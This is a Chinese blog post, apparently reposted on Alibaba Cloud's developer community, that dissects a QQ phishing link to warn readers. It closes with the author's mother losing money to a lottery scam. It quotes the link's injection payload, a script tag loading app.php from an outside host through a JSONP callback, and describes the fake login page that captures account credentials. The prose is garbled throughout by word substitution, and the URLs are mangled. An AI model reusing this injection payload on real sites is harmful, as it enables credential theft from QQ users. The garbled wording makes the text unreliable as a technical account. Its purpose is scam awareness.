阿里云开发者社区

不要再被骗了------QQ盗号本理大揭秘

2018-07-01 2404

版权

版权声明：

原文内容由阿里云真名注册用户自觉奉献，版权归本做者所有，阿里云开发者社区不领有其著做权，亦不承当相应法令义务。详细规矩请查察《 阿里云开发者社区用户效劳和谈》和 《阿里云开发者社区知识产权护卫指引》。假如您发现原社区中有涉嫌抄袭的内容，填写 侵权赞扬表单停行告发，一经查真，原社区将即时增除涉嫌侵权内容。

简介： 前言 相信各人正在懵懂无知的时候都有被盗号的教训吧，QQ胡乱的加摰友，突然有个摰友传了个文件给你，翻开以后发现QQ竟然显示强制下线，而后再也上不去了QAQ，很鲜亮，QQ号被人盗了。最近也是不少小同伴私信我，也看了一些人发空间说QQ号被盗了啥的，以及我原人支到的一些欺骗乞求。

前言

相信各人正在懵懂无知的时候都有被盗号的教训吧，QQ胡乱的加摰友，突然有个摰友传了个文件给你，翻开以后发现QQ竟然显示强制下线，而后再也上不去了QAQ，很鲜亮，QQ号被人盗了。最近也是不少小同伴私信我，也看了一些人发空间说QQ号被盗了啥的，以及我原人支到的一些欺骗乞求。网上针对防骗那块的文章的确没有，为了不让更多的人受害，下面我将会以最真正在朴素的语言引见最常见的一种盗号欺骗方式，浅析一下那个盗号本理的全历程~~~欲望各人不要再上当上圈套啦~！

正文

下面我给各人引见一种最常见的QQ欺骗方式。

那个是我今早支到的一条链接，相信许多冤家肯定也支到类似的链接吧，以至乎不少人都说因为点开那个链接被盗号吧。。。只要不懂安宁，没用安宁意识的人才会那么说吧！！！

让我带各人来阐发一下那个东东吧~~~

很鲜亮，你看那个域名看不出任何眉头，既然各人都不敢点，我就替各人点点看~~~

首先咱们正在手机端点开那个链接

点开一看，咱们可以看到，是一个QQ空间登录界面，那个界面便是一个坑骗用户的界面，为什么那么说呢，你把那个界面链接复制出来，用阅读器翻开，你会发现网页无奈翻开，并且域名成为了下面那个：

?callback=%00%00%00%00%00%00%00%3CscripT/src%3D//p10tss/app.php%3Faid%3D5%3E%3C/scripT%3E%3C!--&bqZZZoqZZZwqtujhigzkumjk.png

看样子域名被阅读器解析成为了一张png图片，你可能会有点猎奇那个，咱们用pc端依照那个地址停行逃踪，用F12查察网页源代码

<scripT/src=//p10tss/app.php?aid=5></scripT><!--({"code":-2,"msg":"\u7528\u6237\u672a\u767b\u5f55"})

就只要那么一止，咱们可以看到从登录页面输入完账号暗码以后会跳转到一个app.php网页里面，咱们安分守纪，间接去逃踪会见这个界面

有点意思，网页从QQ空间停行跳转的

window.location.href = "ht://qzone.qqss";

学过JaZZZaScript的冤家应当晓得，location.href="网站链接"，默示从头定向到新页面，同时刷新翻开的那个页面；

那个意思是从一个伪QQ空间的页面上输入账户暗码，那个页面被植入了php的恶意木马，通过跳转重定向，间接跳转到了木马网站去了，靠山数据库并记录了那条信息，而后你的QQ号账户暗码就被别人乐成获与了~~~

假如不信的话，咱们可以一起来试一试

首先输入账号暗码。。。咱们就等闲伪造一个，账号是3838438，暗码就写一个mmpsbsbsb尝尝看！！！

那里还要说一点，我试的时候那里恍如作的还挺真正在的，防中文输入，我本原想间接住口大骂呢，hhhh，没给我那个机缘。。。

那里无论输入什么账号暗码都可以过，除了中文无奈检测，账号必须是一连串的数字，暗码防了中文输入。

而后我点击登录

看吧，间接就登录乐成为了，另有那张图片，那那那。。。彻底便是挑衅啊，竟然贴一张小狗的图片，是正在考验我智商嘛？

我检验测验了一下ping它的主页，ping p10tss

ping通了，注明那个网站还正在世。

但是登录页面显示403舛错，效劳器谢绝会见，我不是很清楚如何绕过那一防线。

这我也没辙了，技术不够精湛，我只能写下那篇文章记录一下，欲望更多的人看到，不要再上当上圈套了就好~~~

假如文章哪里写的有出路的处所，欲望各位不吝见教，假如有更好的处置惩罚惩罚方案，接待正在评论区留言或私信给我，感谢各人的撑持~~~

对于其余类型的欺骗

可能有些人逢到一些其余的欺骗，比如电话欺骗，短信欺骗，讲一个最真正在的例子，引荐你们看一部电映，叫嘉年华，里面讲演的是对于电信欺骗的案件，那部电映是由真正在变乱改编而成的，很是引荐各人不雅寓目，里面有一些防欺骗的能力，看完以后你会对常见的欺骗技能花腔有了一个更深层次的理解。

假如没有找到资源的小同伴，我也会正在文章中分享给你们一个百度云链接，保存以后下载不雅寓目便可：链接：hts://pan.baiduss/s/1CrYJ9jtkSqqVzZSlzQTsqA 暗码：2qlz

说那么多，可能各人会认为我正在吹法螺皮，认为那些工作不会发作正在原人身上。我讲一个最真正在的例子，我母亲因为前段光阳地上见到一张彩票，刮开奖说中了10w块钱，我身正在一个其真不宽裕的家庭，依照如今的话来讲，算是贫农家庭，还远没抵达小康水平，想想看，10w块钱突如其来，应付咱们那种家庭，那绝对算是一笔相当的工业，其时我妈拿着彩票回家，和我另有我爸磋商来着，我一看说，那肯定是骗局吧，那么好的工作为什么偏偏出如今咱们身上，天上不会掉馅饼，勤勉斗争威力理想成实，我妈偏不信那个邪，想去试一试，而后拨打了上面的电话，上面巴拉巴拉说了一大堆，意思便是要交3000块钱税钱啥的，而后威力兑换那个钱，你看，那不鲜亮是骗局嘛，我妈又感觉，假如获得了那个钱，相当于她少上几多多年的班，其真说皂了那一切都是为了那个不争气的我，我其真也是很愧疚的。所以冤家们要记与，只有谈到钱那个问题，要悠着点，十有八九都是骗局，我妈最后是依照地址打钱已往了，而后事真上，对方并无想要兑换的意思，巴拉巴拉说了一大堆，恍如又是要交钱。。。我妈如今才意识到被骗了，而后跑到警局报了案，警方说，你不是第一个了，对于彩票中奖被骗的人一大堆，他们说没有足够的证据线索，立不了案，没法子了，3k被狗吃了，那可是辛辛苦苦东奔西跑的血汗钱，那些骗子也是一点素心都没有，所以。。。厥后我励志要当一名网警，要把那些逍遥法外的人绳之以法，天网恢恢疏而不漏，那些人最末一定追不了法令的制裁的。

跋文

对于盗号那一问题，我给各人揭示两句，只有少一点猎奇心，少一点贪欲，多一点警惕之心，不论是什么类型的欺骗都不会出如今你身上，谨记哦。。。

您可以思考给博主来个小小的打赏以资激劝，您的肯定将是我最大的动力。thV.

微信打赏

付出宝打赏

做　　者： Angel_Kitty
出　　处：
对于做者：潜心呆板进修以及信息安宁的综折钻研。如有问题或倡议，请多多见教！
版权声明：原文版权归做者和博客园共有，接待转载，但未经做者赞成必须糊口生涯此段声明，且正在文章页面鲜亮位置给出本文链接。
特此声明：所有评论和私信都会正在第一光阳回复。也接待园子的大大们斧正舛错，怪异提高。大概间接私信我
支援博主：假如您感觉文章对您有协助，可以点击左下角【引荐】引荐一下该博文。您的激劝是做者对峙本创和连续写做的最大动力！